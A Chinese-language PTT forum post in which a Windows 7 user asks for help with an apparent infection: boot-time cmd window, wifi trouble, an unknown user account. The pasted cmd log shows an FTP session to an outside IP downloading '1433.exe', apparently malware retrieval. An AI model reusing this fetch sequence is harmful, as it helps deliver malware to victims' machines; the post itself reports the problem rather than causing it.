-- 更新，修正後扫描的纪录 http://0rz.tw/UKKJQ 现在wifi 好像还是有点断断的， 而且为什麽会多一个网路出来(如图) orz... https://www.dropbox.com/s/buvu8jtpybs0dtc/sshot-1.jpg cmd好像也没有再跑出来了 -- 1. 叙述问题：最近发现电脑怪怪，连不上家里分享器的wifi， 开机的时候会跑出一个cmd， 然後刚刚发现有被建立一个奇怪的windows使用者， 以下是cmd里的内容： ---- 尚未启动 Internet Connection Sharing (ICS) 服务。 详细资料，请输入 NET HELPMSG 3521。 ftp> open 221.214.12.243 已连线到 221.214.12.243。 220 Microsoft FTP Service 使用者 (221.214.12.243:(none)): 331 Password required for guest. 230 User guest logged in. ftp> binary 200 Type set to I. ftp> get 1433.exe 200 PORT command successful. 150 Opening BINARY mode data connection for 1433.exe(634880 bytes). 226 Transfer complete. ftp: 634880 位元组已接收，时间: 13.54秒数 46.90KB/sec。 ftp> bye 221 open 221.214.12.243 220 Microsoft FTP Service 331 Password required for guest. 230 User guest logged in. binary 200 Type set to I. get 1433.exe 200 PORT command successful. 150 Opening BINARY mode data connection for 1433.exe(634880 bytes). 226 Transfer complete. 16.4838.51bye 221 ---- 目前已经用卡巴6.0全机扫朴过也删除几个可能的木马了， 也用了SREng， wifi似乎也正常了， 不过开机的CMD程序还是在，启动那边也看不到东西。 2. 系统资料：Windows 7 64 bit 防毒是卡巴6.0 3. 分析报告： Combofix报告： http://sun.cis.scu.edu.tw/~92a39/upload/.txt 其他的我不太会用上传系统，上船的网址都一样， 我把其他放在Dropbox的压缩档里，不好意思 请包涵 http://ppt.cc/2NSs 以上，麻烦版上大大救援，谢谢 --

※ 发信站: 批踢踢实业坊(ptt.cc) ◆ From: 1.160.123.93 ※ 编辑: victor0218 来自: 1.160.123.93 (11/30 21:56) ※ 编辑: victor0218 来自: 1.160.123.93 (11/30 21:59)